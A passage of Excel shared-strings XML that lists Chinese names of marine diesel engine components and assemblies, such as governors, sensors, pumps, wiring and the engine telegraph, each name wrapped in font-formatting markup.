      </rPr>
      <t>缸套壁温传感器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器转速计</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动箱安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆安装</t>
    </r>
  </si>
  <si>
    <r>
      <t>ni-cr/ni</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>速度控制箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>恒压阀布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>稳压器布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力传感器布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>背监控仪安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰的执行器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带套筒的泵体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缓冲指示器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柔性连接</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油泵提升工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿条定距器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷油泵起吊工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吸油阀密封工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气活塞密封工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柱塞</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操控台管系</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操控台供图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电磁阀组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开关布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标准部件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>应急车钟</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>船桥面板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机舱面板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>声音警报</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>信号板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制选择器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>变压器整流器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵台防尘帽</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>临界转速单元</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>计时器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>闪光继电器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>延迟继电器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>编码插头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子设备电流</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保险丝插座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保险丝盖</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部分</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开关支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接线数</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>车钟设备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸控制单元布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助控制单元布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>布线</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆导管布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发动机布线</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电子附件布线</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推荐备件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分开式接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>监控设备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>旁通系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制器旁通系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <t>PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>移动传感器组件</t>
    </r>
  </si>
  <si>
    <r>
      <t>PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器套安装孔</t>
    </r>
  </si>
  <si>
    <r>
      <t>PMI</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器体安装孔</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伸缩管套齿</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油设备布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油设备准备</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油传感器组件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器孔刮油堵漏</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油接线箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油系统警报箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>间断性润滑布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>间断性润滑控制箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>切断阀组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油限制缸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>臂</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平衡臂</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平衡臂安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调整说明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>最大调速器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压放大器</t>
    </r>
  </si>
  <si>
    <r>
      <t>UG</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>同步设备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压泵单元</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵组布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器和驱动</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力开关布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器冷却器管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>放大器布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接头部件安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>促动泵管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停车设备安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>超速停车安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>一对锥齿轮</t>
    </r>
  </si>
  <si>
    <r>
      <t>woodward</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>臂</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动控制布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>订单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>升压器</t>
    </r>
    <r>
      <rPr>
